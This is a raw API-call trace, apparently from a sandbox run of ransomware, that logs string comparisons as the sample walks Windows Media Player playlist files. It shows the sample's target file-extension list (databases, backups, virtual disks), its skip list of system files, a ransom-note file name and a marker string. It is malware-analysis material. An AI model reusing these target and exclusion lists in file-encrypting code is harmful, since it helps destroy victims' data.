lstrlenW (lpString="kdb") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="kdb") returned 1 [0042.135] lstrlenW (lpString="kexi") returned 4 [0042.135] lstrcmpiW (lpString1=".wpl", lpString2="kexi") returned -1 [0042.135] lstrlenW (lpString="kexic") returned 5 [0042.135] lstrcmpiW (lpString1="s.wpl", lpString2="kexic") returned 1 [0042.135] lstrlenW (lpString="kexis") returned 5 [0042.135] lstrcmpiW (lpString1="s.wpl", lpString2="kexis") returned 1 [0042.135] lstrlenW (lpString="lgc") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="lgc") returned 1 [0042.135] lstrlenW (lpString="lwx") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="lwx") returned 1 [0042.135] lstrlenW (lpString="maf") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="maf") returned 1 [0042.136] lstrlenW (lpString="maq") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="maq") returned 1 [0042.136] lstrlenW (lpString="mar") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mar") returned 1 [0042.136] lstrlenW (lpString="marshal") returned 7 [0042.136] lstrcmpiW (lpString1="ars.wpl", lpString2="marshal") returned -1 [0042.136] lstrlenW (lpString="mas") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mas") returned 1 [0042.136] lstrlenW (lpString="mav") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mav") returned 1 [0042.136] lstrlenW (lpString="maw") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="maw") returned 1 [0042.136] lstrlenW (lpString="mdbhtml") returned 7 [0042.136] lstrcmpiW (lpString1="ars.wpl", lpString2="mdbhtml") returned -1 [0042.136] lstrlenW (lpString="mdn") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mdn") returned 1 [0042.136] lstrlenW (lpString="mdt") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mdt") returned 1 [0042.136] lstrlenW (lpString="mfd") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mfd") returned 1 [0042.136] lstrlenW (lpString="mpd") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mpd") returned 1 [0042.136] lstrlenW (lpString="mrg") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mrg") returned 1 [0042.136] lstrlenW (lpString="mud") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mud") returned 1 [0042.136] lstrlenW (lpString="mwb") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="mwb") returned 1 [0042.136] lstrlenW (lpString="myd") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="myd") returned 1 [0042.136] lstrlenW (lpString="ndf") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="ndf") returned 1 [0042.136] lstrlenW (lpString="nnt") returned 3 [0042.136] lstrcmpiW (lpString1="wpl", lpString2="nnt") returned 1 [0042.136] lstrlenW (lpString="nrmlib") returned 6 [0042.137] lstrcmpiW (lpString1="rs.wpl", lpString2="nrmlib") returned 1 [0042.137] lstrlenW (lpString="ns2") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="ns2") returned 1 [0042.137] lstrlenW (lpString="ns3") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="ns3") returned 1 [0042.137] lstrlenW (lpString="ns4") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="ns4") returned 1 [0042.137] lstrlenW (lpString="nsf") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="nsf") returned 1 [0042.137] lstrlenW (lpString="nv") returned 2 [0042.137] lstrcmpiW (lpString1="pl", lpString2="nv") returned 1 [0042.137] lstrlenW (lpString="nv2") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="nv2") returned 1 [0042.137] lstrlenW (lpString="nwdb") returned 4 [0042.137] lstrcmpiW (lpString1=".wpl", lpString2="nwdb") returned -1 [0042.137] lstrlenW (lpString="nyf") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="nyf") returned 1 [0042.137] lstrlenW (lpString="odb") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="odb") returned 1 [0042.137] lstrlenW (lpString="odb") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="odb") returned 1 [0042.137] lstrlenW (lpString="oqy") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="oqy") returned 1 [0042.137] lstrlenW (lpString="ora") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="ora") returned 1 [0042.137] lstrlenW (lpString="orx") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="orx") returned 1 [0042.137] lstrlenW (lpString="owc") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="owc") returned 1 [0042.137] lstrlenW (lpString="p96") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="p96") returned 1 [0042.137] lstrlenW (lpString="p97") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="p97") returned 1 [0042.137] lstrlenW (lpString="pan") returned 3 [0042.137] lstrcmpiW (lpString1="wpl", lpString2="pan") returned 1 [0042.137] lstrlenW (lpString="pdb") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="pdb") returned 1 [0042.138] lstrlenW (lpString="pdm") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="pdm") returned 1 [0042.138] lstrlenW (lpString="pnz") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="pnz") returned 1 [0042.138] lstrlenW (lpString="qry") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="qry") returned 1 [0042.138] lstrlenW (lpString="qvd") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="qvd") returned 1 [0042.138] lstrlenW (lpString="rbf") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="rbf") returned 1 [0042.138] lstrlenW (lpString="rctd") returned 4 [0042.138] lstrcmpiW (lpString1=".wpl", lpString2="rctd") returned -1 [0042.138] lstrlenW (lpString="rod") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="rod") returned 1 [0042.138] lstrlenW (lpString="rodx") returned 4 [0042.138] lstrcmpiW (lpString1=".wpl", lpString2="rodx") returned -1 [0042.138] lstrlenW (lpString="rpd") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="rpd") returned 1 [0042.138] lstrlenW (lpString="rsd") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="rsd") returned 1 [0042.138] lstrlenW (lpString="sas7bdat") returned 8 [0042.138] lstrcmpiW (lpString1="tars.wpl", lpString2="sas7bdat") returned 1 [0042.138] lstrlenW (lpString="sbf") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="sbf") returned 1 [0042.138] lstrlenW (lpString="scx") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="scx") returned 1 [0042.138] lstrlenW (lpString="sdb") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="sdb") returned 1 [0042.138] lstrlenW (lpString="sdc") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="sdc") returned 1 [0042.138] lstrlenW (lpString="sdf") returned 3 [0042.138] lstrcmpiW (lpString1="wpl", lpString2="sdf") returned 1 [0042.138] lstrlenW (lpString="sis") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="sis") returned 1 [0042.139] lstrlenW (lpString="spq") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="spq") returned 1 [0042.139] lstrlenW (lpString="te") returned 2 [0042.139] lstrcmpiW (lpString1="pl", lpString2="te") returned -1 [0042.139] lstrlenW (lpString="teacher") returned 7 [0042.139] lstrcmpiW (lpString1="ars.wpl", lpString2="teacher") returned -1 [0042.139] lstrlenW (lpString="tmd") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="tmd") returned 1 [0042.139] lstrlenW (lpString="tps") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="tps") returned 1 [0042.139] lstrlenW (lpString="trc") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="trc") returned 1 [0042.139] lstrlenW (lpString="trc") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="trc") returned 1 [0042.139] lstrlenW (lpString="trm") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="trm") returned 1 [0042.139] lstrlenW (lpString="udb") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="udb") returned 1 [0042.139] lstrlenW (lpString="udl") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="udl") returned 1 [0042.139] lstrlenW (lpString="usr") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="usr") returned 1 [0042.139] lstrlenW (lpString="v12") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="v12") returned 1 [0042.139] lstrlenW (lpString="vis") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="vis") returned 1 [0042.139] lstrlenW (lpString="vpd") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="vpd") returned 1 [0042.139] lstrlenW (lpString="vvv") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="vvv") returned 1 [0042.139] lstrlenW (lpString="wdb") returned 3 [0042.139] lstrcmpiW (lpString1="wpl", lpString2="wdb") returned 1 [0042.139] lstrlenW (lpString="wmdb") returned 4 [0042.139] lstrcmpiW (lpString1=".wpl", lpString2="wmdb") returned -1 [0042.140] lstrlenW (lpString="wrk") returned 3 [0042.140] lstrcmpiW (lpString1="wpl", lpString2="wrk") returned -1 [0042.140] lstrlenW (lpString="xdb") returned 3 [0042.140] lstrcmpiW (lpString1="wpl", lpString2="xdb") returned -1 [0042.140] lstrlenW (lpString="xld") returned 3 [0042.140] lstrcmpiW (lpString1="wpl", lpString2="xld") returned -1 [0042.140] lstrlenW (lpString="xmlff") returned 5 [0042.140] lstrcmpiW (lpString1="s.wpl", lpString2="xmlff") returned -1 [0042.140] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="aoldtz.exe") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".") returned 1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="..") returned 1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="windows") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="bootmgr") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="temp") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="pagefile.sys") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="boot") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="ids.txt") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="ntuser.dat") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="perflogs") returned -1 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="MSBuild") returned -1 [0042.140] lstrlenW (lpString="02_Music_added_in_the_last_month.wpl") returned 36 [0042.140] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 124 [0042.140] lstrcpyW (in: lpString1=0x2e2e914, lpString2="02_Music_added_in_the_last_month.wpl" | out: lpString1="02_Music_added_in_the_last_month.wpl") returned="02_Music_added_in_the_last_month.wpl" [0042.140] lstrlenW (lpString="02_Music_added_in_the_last_month.wpl") returned 36 [0042.140] lstrlenW (lpString="Ares865") returned 7 [0042.140] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.140] lstrlenW (lpString=".dll") returned 4 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".dll") returned 1 [0042.140] lstrlenW (lpString=".lnk") returned 4 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".lnk") returned 1 [0042.140] lstrlenW (lpString=".ini") returned 4 [0042.140] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".ini") returned 1 [0042.140] lstrlenW (lpString=".sys") returned 4 [0042.141] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".sys") returned 1 [0042.141] lstrlenW (lpString="02_Music_added_in_the_last_month.wpl") returned 36 [0042.141] lstrlenW (lpString="bak") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="bak") returned 1 [0042.141] lstrlenW (lpString="ba_") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="ba_") returned 1 [0042.141] lstrlenW (lpString="dbb") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="dbb") returned 1 [0042.141] lstrlenW (lpString="vmdk") returned 4 [0042.141] lstrcmpiW (lpString1=".wpl", lpString2="vmdk") returned -1 [0042.141] lstrlenW (lpString="rar") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="rar") returned 1 [0042.141] lstrlenW (lpString="zip") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="zip") returned -1 [0042.141] lstrlenW (lpString="tgz") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="tgz") returned 1 [0042.141] lstrlenW (lpString="vbox") returned 4 [0042.141] lstrcmpiW (lpString1=".wpl", lpString2="vbox") returned -1 [0042.141] lstrlenW (lpString="vdi") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="vdi") returned 1 [0042.141] lstrlenW (lpString="vhd") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="vhd") returned 1 [0042.141] lstrlenW (lpString="vhdx") returned 4 [0042.141] lstrcmpiW (lpString1=".wpl", lpString2="vhdx") returned -1 [0042.141] lstrlenW (lpString="avhd") returned 4 [0042.141] lstrcmpiW (lpString1=".wpl", lpString2="avhd") returned -1 [0042.141] lstrlenW (lpString="db") returned 2 [0042.141] lstrcmpiW (lpString1="pl", lpString2="db") returned 1 [0042.141] lstrlenW (lpString="db2") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="db2") returned 1 [0042.141] lstrlenW (lpString="db3") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="db3") returned 1 [0042.141] lstrlenW (lpString="dbf") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="dbf") returned 1 [0042.141] lstrlenW (lpString="mdf") returned 3 [0042.141] lstrcmpiW (lpString1="wpl", lpString2="mdf") returned 1 [0042.142] lstrlenW (lpString="mdb") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="mdb") returned 1 [0042.142] lstrlenW (lpString="sql") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="sql") returned 1 [0042.142] lstrlenW (lpString="sqlite") returned 6 [0042.142] lstrcmpiW (lpString1="th.wpl", lpString2="sqlite") returned 1 [0042.142] lstrlenW (lpString="sqlite3") returned 7 [0042.142] lstrcmpiW (lpString1="nth.wpl", lpString2="sqlite3") returned -1 [0042.142] lstrlenW (lpString="sqlitedb") returned 8 [0042.142] lstrcmpiW (lpString1="onth.wpl", lpString2="sqlitedb") returned -1 [0042.142] lstrlenW (lpString="xml") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="xml") returned -1 [0042.142] lstrlenW (lpString="$er") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="$er") returned 1 [0042.142] lstrlenW (lpString="4dd") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="4dd") returned 1 [0042.142] lstrlenW (lpString="4dl") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="4dl") returned 1 [0042.142] lstrlenW (lpString="^^^") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="^^^") returned 1 [0042.142] lstrlenW (lpString="abs") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="abs") returned 1 [0042.142] lstrlenW (lpString="abx") returned 3 [0042.142] lstrcmpiW (lpString1="wpl", lpString2="abx") returned 1 [0042.142] lstrlenW (lpString="accdb") returned 5 [0042.142] lstrcmpiW (lpString1="h.wpl", lpString2="accdb") returned 1 [0042.142] lstrlenW (lpString="accdc") returned 5 [0042.142] lstrcmpiW (lpString1="h.wpl", lpString2="accdc") returned 1 [0042.142] lstrlenW (lpString="accde") returned 5 [0042.142] lstrcmpiW (lpString1="h.wpl", lpString2="accde") returned 1 [0042.142] lstrlenW (lpString="accdr") returned 5 [0042.142] lstrcmpiW (lpString1="h.wpl", lpString2="accdr") returned 1 [0042.142] lstrlenW (lpString="accdt") returned 5 [0042.142] lstrcmpiW (lpString1="h.wpl", lpString2="accdt") returned 1 [0042.143] lstrlenW (lpString="accdw") returned 5 [0042.143] lstrcmpiW (lpString1="h.wpl", lpString2="accdw") returned 1 [0042.143] lstrlenW (lpString="accft") returned 5 [0042.143] lstrcmpiW (lpString1="h.wpl", lpString2="accft") returned 1 [0042.143] lstrlenW (lpString="adb") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0042.143] lstrlenW (lpString="adb") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0042.143] lstrlenW (lpString="ade") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="ade") returned 1 [0042.143] lstrlenW (lpString="adf") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="adf") returned 1 [0042.143] lstrlenW (lpString="adn") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="adn") returned 1 [0042.143] lstrlenW (lpString="adp") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="adp") returned 1 [0042.143] lstrlenW (lpString="alf") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="alf") returned 1 [0042.143] lstrlenW (lpString="ask") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="ask") returned 1 [0042.143] lstrlenW (lpString="btr") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="btr") returned 1 [0042.143] lstrlenW (lpString="cat") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="cat") returned 1 [0042.143] lstrlenW (lpString="cdb") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="cdb") returned 1 [0042.143] lstrlenW (lpString="ckp") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="ckp") returned 1 [0042.143] lstrlenW (lpString="cma") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="cma") returned 1 [0042.143] lstrlenW (lpString="cpd") returned 3 [0042.143] lstrcmpiW (lpString1="wpl", lpString2="cpd") returned 1 [0042.143] lstrlenW (lpString="dacpac") returned 6 [0042.143] lstrcmpiW (lpString1="th.wpl", lpString2="dacpac") returned 1 [0042.144] lstrlenW (lpString="dad") returned 3 [0042.144] lstrcmpiW (lpString1="wpl", lpString2="dad") returned 1 [0042.144] lstrlenW (lpString="dadiagrams") returned 10 [0042.144] lstrcmpiW (lpString1="_month.wpl", lpString2="dadiagrams") returned -1 [0042.144] lstrlenW (lpString="daschema") returned 8 [0042.144] lstrcmpiW (lpString1="onth.wpl", lpString2="daschema") returned 1 [0042.144] lstrlenW (lpString="db-journal") returned 10 [0042.144] lstrcmpiW (lpString1="_month.wpl", lpString2="db-journal") returned -1 [0042.144] lstrlenW (lpString="db-shm") returned 6 [0042.144] lstrcmpiW (lpString1="th.wpl", lpString2="db-shm") returned 1 [0042.144] lstrlenW (lpString="db-wal") returned 6 [0042.144] lstrcmpiW (lpString1="th.wpl", lpString2="db-wal") returned 1 [0042.144] lstrlenW (lpString="dbc") returned 3 [0042.144] lstrcmpiW (lpString1="wpl", lpString2="dbc") returned 1 [0042.144] lstrlenW (lpString="dbs") returned 3 [0042.144] lstrcmpiW (lpString1="wpl", lpString2="dbs") returned 1 [0042.144] lstrlenW (lpString="dbt") returned 3 [0042.144] lstrcmpiW (lpString1="wpl", lpString2="dbt") returned 1 [0042.144] lstrlenW (lpString="dbv") returned 3 [0042.144] lstrcmpiW (lpString1="wpl", lpString2="dbv") returned 1 [0042.144] lstrlenW (lpString="dbx") returned 3 [0042.144] lstrcmpiW (lpString1="wpl", lpString2="dbx") returned 1 [0042.144] lstrlenW (lpString="dcb") returned 3 [0042.144] lstrcmpiW (lpString1="wpl", lpString2="dcb") returned 1 [0042.144] lstrcpyW (in: lpString1=0x2e2e914, lpString2="03_Music_rated_at_4_or_5_stars.wpl" | out: lpString1="03_Music_rated_at_4_or_5_stars.wpl") returned="03_Music_rated_at_4_or_5_stars.wpl" [0042.144] lstrlenW (lpString="03_Music_rated_at_4_or_5_stars.wpl") returned 34 [0042.144] lstrlenW (lpString="Ares865") returned 7 [0042.144] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.144] lstrlenW (lpString=".dll") returned 4 [0042.144] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".dll") returned 1 [0042.144] lstrlenW (lpString=".lnk") returned 4 [0042.144] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".lnk") returned 1 [0042.145] lstrlenW (lpString=".ini") returned 4 [0042.145] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".ini") returned 1 [0042.145] lstrlenW (lpString=".sys") returned 4 [0042.145] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".sys") returned 1 [0042.145] lstrlenW (lpString="03_Music_rated_at_4_or_5_stars.wpl") returned 34 [0042.145] lstrcpyW (in: lpString1=0x2e2e914, lpString2="04_Music_played_in_the_last_month.wpl" | out: lpString1="04_Music_played_in_the_last_month.wpl") returned="04_Music_played_in_the_last_month.wpl" [0042.145] lstrlenW (lpString="04_Music_played_in_the_last_month.wpl") returned 37 [0042.145] lstrlenW (lpString="Ares865") returned 7 [0042.145] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.145] lstrlenW (lpString=".dll") returned 4 [0042.145] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".dll") returned 1 [0042.145] lstrlenW (lpString=".lnk") returned 4 [0042.145] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".lnk") returned 1 [0042.145] lstrlenW (lpString=".ini") returned 4 [0042.145] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".ini") returned 1 [0042.145] lstrlenW (lpString=".sys") returned 4 [0042.145] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2=".sys") returned 1 [0042.145] lstrlenW (lpString="04_Music_played_in_the_last_month.wpl") returned 37 [0042.146] lstrcpyW (in: lpString1=0x2e2e914, lpString2="05_Pictures_taken_in_the_last_month.wpl" | out: lpString1="05_Pictures_taken_in_the_last_month.wpl") returned="05_Pictures_taken_in_the_last_month.wpl" [0042.148] lstrlenW (lpString="05_Pictures_taken_in_the_last_month.wpl") returned 39 [0042.148] lstrlenW (lpString="Ares865") returned 7 [0042.148] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.148] lstrlenW (lpString=".dll") returned 4 [0042.149] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".dll") returned 1 [0042.149] lstrlenW (lpString=".lnk") returned 4 [0042.149] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".lnk") returned 1 [0042.149] lstrlenW (lpString=".ini") returned 4 [0042.149] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".ini") returned 1 [0042.149] lstrlenW (lpString=".sys") returned 4 [0042.149] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2=".sys") returned 1 [0042.149] lstrlenW (lpString="05_Pictures_taken_in_the_last_month.wpl") returned 39 [0042.149] lstrcpyW (in: lpString1=0x2e2e914, lpString2="06_Pictures_rated_4_or_5_stars.wpl" | out: lpString1="06_Pictures_rated_4_or_5_stars.wpl") returned="06_Pictures_rated_4_or_5_stars.wpl" [0042.149] lstrlenW (lpString="06_Pictures_rated_4_or_5_stars.wpl") returned 34 [0042.149] lstrlenW (lpString="Ares865") returned 7 [0042.149] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.149] lstrlenW (lpString=".dll") returned 4 [0042.149] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".dll") returned 1 [0042.149] lstrlenW (lpString=".lnk") returned 4 [0042.149] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".lnk") returned 1 [0042.149] lstrlenW (lpString=".ini") returned 4 [0042.149] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".ini") returned 1 [0042.149] lstrlenW (lpString=".sys") returned 4 [0042.149] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".sys") returned 1 [0042.149] lstrlenW (lpString="06_Pictures_rated_4_or_5_stars.wpl") returned 34 [0042.149] lstrcpyW (in: lpString1=0x2e2e914, lpString2="07_TV_recorded_in_the_last_week.wpl" | out: lpString1="07_TV_recorded_in_the_last_week.wpl") returned="07_TV_recorded_in_the_last_week.wpl" [0042.149] lstrlenW (lpString="07_TV_recorded_in_the_last_week.wpl") returned 35 [0042.149] lstrlenW (lpString="Ares865") returned 7 [0042.149] lstrcmpiW (lpString1="eek.wpl", lpString2="Ares865") returned 1 [0042.149] lstrlenW (lpString=".dll") returned 4 [0042.149] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".dll") returned 1 [0042.149] lstrlenW (lpString=".lnk") returned 4 [0042.149] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".lnk") returned 1 [0042.149] lstrlenW (lpString=".ini") returned 4 [0042.150] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".ini") returned 1 [0042.150] lstrlenW (lpString=".sys") returned 4 [0042.150] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".sys") returned 1 [0042.150] lstrlenW (lpString="07_TV_recorded_in_the_last_week.wpl") returned 35 [0042.150] lstrcpyW (in: lpString1=0x2e2e914, lpString2="08_Video_rated_at_4_or_5_stars.wpl" | out: lpString1="08_Video_rated_at_4_or_5_stars.wpl") returned="08_Video_rated_at_4_or_5_stars.wpl" [0042.150] lstrlenW (lpString="08_Video_rated_at_4_or_5_stars.wpl") returned 34 [0042.150] lstrlenW (lpString="Ares865") returned 7 [0042.150] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.150] lstrlenW (lpString=".dll") returned 4 [0042.150] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".dll") returned 1 [0042.150] lstrlenW (lpString=".lnk") returned 4 [0042.150] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".lnk") returned 1 [0042.150] lstrlenW (lpString=".ini") returned 4 [0042.150] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".ini") returned 1 [0042.150] lstrlenW (lpString=".sys") returned 4 [0042.150] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".sys") returned 1 [0042.150] lstrlenW (lpString="08_Video_rated_at_4_or_5_stars.wpl") returned 34 [0042.150] lstrcpyW (in: lpString1=0x2e2e914, lpString2="09_Music_played_the_most.wpl" | out: lpString1="09_Music_played_the_most.wpl") returned="09_Music_played_the_most.wpl" [0042.150] lstrlenW (lpString="09_Music_played_the_most.wpl") returned 28 [0042.150] lstrlenW (lpString="Ares865") returned 7 [0042.150] lstrcmpiW (lpString1="ost.wpl", lpString2="Ares865") returned 1 [0042.150] lstrlenW (lpString=".dll") returned 4 [0042.150] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".dll") returned 1 [0042.150] lstrlenW (lpString=".lnk") returned 4 [0042.150] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".lnk") returned 1 [0042.150] lstrlenW (lpString=".ini") returned 4 [0042.150] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".ini") returned 1 [0042.150] lstrlenW 